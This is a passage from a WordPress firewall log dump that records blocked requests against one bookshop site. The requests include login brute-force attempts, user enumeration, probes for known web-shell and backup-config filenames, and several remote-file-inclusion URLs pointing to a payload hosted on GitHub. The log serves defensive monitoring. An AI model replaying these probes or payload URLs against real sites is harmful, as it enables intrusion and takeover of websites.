Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','AXlsQbzmTEykVLHct7x3oYPZ',0,1637753459.2665,401,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','s7fQkoVZhyXLvSYA3b45Rqxu',0,1637753459.9532,139,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','ahmlJQypXcD9bvITACsnfRk2',0,1637753460.3622,382,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','HnT5GBPpVcOXkRLfMoWiKJvr',0,1637753461.0335,447,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','0lEAMvIjh89HCdsNZtRFoVQB',0,1637753461.8188,162,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','aezO2Tn4g7Yy5hpDjW9iVo3x',0,1637753462.2598,430,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','lpB5v0KTZQycjEFXU1MGeVRn',0,1637753463.0231,419,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','43dtBFxXwAcbf6rpKCYLNh2W',0,1637753463.7249,230,'','POST',404,0,700,0,1,'',0),('165.227.115.229',2783146981,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1464.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','2WpBIKlxGib0sqQfywg9ALnv',0,1637753464.2247,414,'','POST',404,0,700,0,1,'',0),('159.223.62.33',2682207777,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','o48e0JzpGSTsAltCr2Ed6vMu',0,1637759413.0852,434,'','GET',403,0,520,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','hpYibaTqrnGFHI9W52JK18xD',0,1637765734.2385,1165,'','GET',403,0,520,0,1,'',0),('67.205.3.33',1137509153,'','https://ashbooks.co.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','z69PYWcJOK0bUfsjH4GntwRN',0,1637767920.1177,471,'','GET',403,0,700,0,1,'',0),('67.205.3.33',1137509153,'','https://ashbooks.co.uk/wp-content/uploads/2020/02/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"ashbooks.co.uk\"}','63ar2eyuHDtRmC7WBFLcNdwq',0,1637767966.4518,824,'','GET',403,0,700,0,1,'',0),('185.220.101.17',3118228753,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','IoNuH59igCm3j4ZMaqL0KbTl',0,1637768314.9692,500,'','POST',403,0,600,0,1,'',0),('47.117.83.25',796218137,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','vfeLjx2digCHqKuY4k69rEhJ',0,1637772005.6340,404,'','GET',403,0,520,0,1,'',0),('47.117.83.25',796218137,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','NShDvfZa4BomiPLkVWs80r2n',0,1637772005.2092,839,'','GET',403,0,520,0,1,'',0),('185.220.100.255',3118228735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko\\/20100101 Firefox\\/55.0\"}','obk0qRfhEPTYd1iw3ULAOgDu',0,1637773705.0203,737,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','Xf34sNAPYT92GWu1ecFyLhtr',0,1637774668.6599,179,'','POST',403,0,600,0,1,'',0),('178.128.216.116',2994788468,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','zRrmQuVv94BYfKoGhnObkqJg',0,1637783881.7306,143,'','GET',403,0,520,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','He9NxgZ4hpVc5Dm3OzAl0Iv2',0,1637789726.1791,320,'','GET',403,0,520,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','QFz4Sp1CWGcI7bweTLdPnvOt',0,1637795405.0051,440,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/chart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','nR95sJIOouPyLeA3lN2tkvKq',0,1637797449.7740,437,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','e5BJLS9WzvuKtXcqPkEfHmQC',0,1637809696.8901,444,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QoMs1c5eLyvjqIhmVNPT24b8',0,1637809697.8605,152,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8ha2E0fxM3onRVzKqsQwD56e',0,1637809698.4878,430,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3KhzjNFWtfwqCHEvx9mdMZGT',0,1637809699.4631,458,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Fh4ixVkYqBpzLmcHlUC27NgW',0,1637809701.9808,148,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','E0dIiYTuyZ1mAQXzR269NCok',0,1637809702.6635,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uzYMUv2oVCrBg8D71NjT9ifp',0,1637809704.3414,602,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rsHuCqzF2RJIYkQleVW01Liw',0,1637809705.4044,434,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hLsM98kImFW5BnbwoqP3pA2j',0,1637809707.0319,452,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RCcPgxpTXZHBGqjrN7o4i9wF',0,1637809708.2646,549,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yoElf6naVA49TY7LgqUBQWHM',0,1637809709.3248,422,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2rS6iTV4OzwAkZ8LxJuyChGB',0,1637809710.2036,393,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1AMND3yeHkYKLZxqzr2aBVUw',0,1637809711.0731,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dtEyJ1Nrih8Vf2wPgHMvj6RW',0,1637809712.0311,389,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','x2nsX6pDybWJqEo94iATeHjC',0,1637809712.8946,197,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6Dko8YlTCrbw7WFcLMg4uGNe',0,1637809713.5425,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SbsJQx03EtnrXzemBd56M7Gf',0,1637809714.4085,125,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ak0K984PEGDS2QpjFVbOdfg1',0,1637809714.9868,213,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IExTcvj25zeR8JM3ndao7CZb',0,1637809715.6705,398,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','awAei7gXZPMLSDQuInvF6qhB',0,1637809716.5433,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XdwBaHfZSJKutElVpIALe0Ug',0,1637809717.3822,467,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZKG3QYTjvtl5PNwmFpBaouEr',0,1637809718.3170,411,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xzJ0P3CKiprvmMgWBh7cQnuE',0,1637809719.1879,448,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aoN8c4kK1b3eWUfrQM6iXRZD',0,1637809720.1034,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xLp2MyBCsJ4GwQEmhDKRHftW',0,1637809720.9519,189,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','q0kVYtQ2Xu9Ti1CNbZHye34O',0,1637809721.6039,465,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MZsV9QLUjTvuFAWwdgNDlBK2',0,1637809722.5450,385,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PQDBm9c43dC0SbWOGrfXYEKq',0,1637809723.3867,387,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aRUEcGdyOmiS4tHrQKFAlBnw',0,1637809724.2573,381,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4gxi7tmXaEOfWYk3eLNKFsHU',0,1637809725.1189,413,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','otFLqEKcP0G4sU5wHkCOYlbQ',0,1637809725.9887,198,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BNWwZ8M4UoOGsxYq1uaHfDzX',0,1637809726.6554,429,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GhyQVnrxAH4lUugIcSFP0jMB',0,1637809727.5779,375,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Y1sXaEPCtIqA4KVzUp6xc0Zo',0,1637809728.4293,382,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','z5dIHUETAtrwMQvsBi1h23Sm',0,1637809729.2645,431,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mOEobzR5ZjLvnNe0rUp3iwAQ',0,1637809730.1567,437,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Yo0PxJRdC2zb9vZsSHwTr6aB',0,1637809731.0621,431,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kW07DlbcLmCeIuY4sQrOFTx6',0,1637809731.9704,172,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hSngz79kJCjsO6owufbrL2VR',0,1637809732.6278,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ksyzWCPBVdrwx0ebpclTU9Zm',0,1637809733.5036,380,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O46Df5TWaMdVknhNlbCS1YZg',0,1637809734.3491,414,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','riDhb0yHQV69uF85M7SXJGv3',0,1637809735.2212,443,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yhwOUHV4N08DZbFM6fmAdIau',0,1637809736.1488,382,'','GET',403,0,700,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','31Ic4GE08Lqn75VZAwk9Jlrt',0,1637811594.9391,391,'','POST',403,0,600,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','wJoYvyTI2s5AmpEgXOGC1W8h',0,1637817528.1378,405,'','GET',403,0,520,0,1,'',0),('69.197.160.228',1170579684,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','9JejLkYuwNTQKSoxBvIEdg0O',0,1637827750.8889,197,'','POST',403,0,600,0,1,'',0),('185.103.199.116',3110586228,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','LTdJ5Of47DUsqHAaeIVwRGpZ',0,1637830556.2613,420,'','GET',403,0,700,0,1,'',0),('195.154.82.73',3281670729,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','s1CxG4NclY3Eh0XAU5yFZRMP',0,1637833328.5627,152,'','GET',403,0,520,0,1,'',0),('5.2.77.22',84036886,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','mXa56SFZfh3sBGuEAbLK9Mvr',0,1637837621.8999,231,'','POST',403,0,600,0,1,'',0),('107.150.48.235',1805005035,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','7bUpKwJcWhHtumBGIaAEzqv1',0,1637841003.4766,440,'','POST',403,0,600,0,1,'',0),('89.207.146.189',1506775741,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','LQ2358gHCOcnE9PNAqBjYyfi',0,1637847839.0759,571,'','POST',403,0,600,0,1,'',0),('198.52.97.144',3325321616,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','OTS4LZX6KIAYn795yG1VJN0u',0,1637851256.5144,803,'','POST',403,0,600,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 